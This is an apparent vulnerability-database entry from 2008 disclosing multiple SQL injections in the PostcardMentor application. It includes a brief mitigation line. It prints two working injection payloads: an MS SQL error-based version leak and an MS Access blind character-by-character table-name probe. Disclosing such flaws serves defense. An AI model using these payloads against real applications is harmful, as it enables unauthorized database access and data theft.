vendor:
PostcardMentor
by:
InjEctOrs
7.5
CVSS
HIGH
SQL Injection
89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'))
CWE
Product Name: PostcardMentor
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Multiple SQL Injections [Remote + Blind]
Multiple SQL Injections can be used to gain access to the PostcardMentor application. For MS SQL Server, the exploit is 'convert(int,(select+@@version))' and for MS Access, the exploit is '1 IIF((select%20mid(last(name),1,1)%20from%20(select%20top%2010%20name%20from%20cat))='a',0,'done')'
Mitigation:
Ensure that user input is properly sanitized and validated before being used in an SQL query.